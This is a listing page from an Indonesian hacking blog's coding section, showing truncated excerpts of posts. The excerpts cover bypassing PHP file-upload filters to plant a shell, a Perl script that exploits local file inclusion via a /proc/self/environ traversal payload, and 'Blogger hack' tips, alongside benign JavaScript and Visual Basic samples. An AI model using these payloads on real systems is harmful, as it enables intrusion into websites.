Home / Coding (page 2)

Coding

Coding, Scripting, Programming, Software

Bypass PHP Arbitrary File Upload

5853392218_18e8164613_z

Ok semua.. Sekarang saya akan melanjutkan pembahasan Tentang PHP Arbitrary File Upload. Yang sebelumnya telah dibahas di: http://www.binushacker.net/php-arbitrary-file-upload-simple-patching.html Ok disana patchingnya emang ga terlalu bagus… Karena filetype bisa di manipulasi.. Bukan dengan merename shell.jpg.php tetapi dengan memanipulasi “header” file Cara membypassnya adalah sebagai berikut: Review codenya dulu Kalo kita coba …

Read More »

PHP Arbitrary File Upload Simple Patching

file-upload-patch

Saya akan membahas tentang cara simple mempatch PHP Arbitrary File Upload. Kebanyakan website yang vuln diupload memiliki garis besar seperti ini: Contoh simple upload.php file upload. [crayon-5d37a5ca118a8101763898/] Contoh form yang dipake dalam file index untuk upload: [crayon-5d37a5ca118b7506964088/] Disini tidak ada code yang memfilter upload filetype. Jadi kita bisa langsung saja …

Read More »

LFI Remote Execute in PERL

black-hat-logo

Script berikut untuk menjalankan/mengeksekusi LFI proc/elft/environ secara simple di shell. #! /usr/bin/perl use LWP; use HTTP::Request; if (@ARGV < 1) { print "\n==========================================\n"; print " LFI Command Execution \n"; print "==========================================\n"; print "Usage: perl LFI.pl (without http:://)\n"; print "Ex. perl FLI.pl www.korban.com/index.php?page=\n"; exit; } $host=$ARGV[0]; $lfi = "..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron"; print "Try …

Read More »

Contoh Java Script Check & Uncheck All

coding1

< !DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>Contoh Latihan  Javascript :: Check & Uncheck All</title> </head> <script type=”text/javascript”> function Check(){ //Ambil semua elemen dalam id formCheck allCheckList = document.getElementById(“formCheck”).elements; //Hitung banyaknya elemen jumlahCheckList = allCheckList.length; //Jika tombolCheck bernilai “Check All” …

Read More »

Visual Basic – Daftar Buku Project

visualbasics

Sekarang kita mencoba belajar Database visual basic, yaitu database dengan menggunakan Microsoft Office Acces sebagai sumber datanya. Kita akan membuat sebuah aplikasi sederhana “Koleksi Bukuku” yang berfungsi untuk menyimpan daftar koleksi buku yang mungkin sangat banyak dan kita belum sempat melakukan inventarisasi terhadapnya.Saya sendiri sempat terkejut pada saat saya membuat …

Read More »

Blogs + Blogger Hack – Hacking 2008

password+blogger

Dibawah ini merupakan Kumpulan tutorial singkat Blogspot dan beberapa Blogger Hack yang paling sering ditanyakan. Sengaja saya tidak membuat tulisan per-artikel mengingat penjelasannya terlalu singkat dan terbilang sederhana. Nah..untuk menjawab pertanyaan yang sama dan sering pada komentar dan Imel yang masuk saya kumpulkan aja jadi satu. Silahkan dicoba 🙂 Agar …

Read More »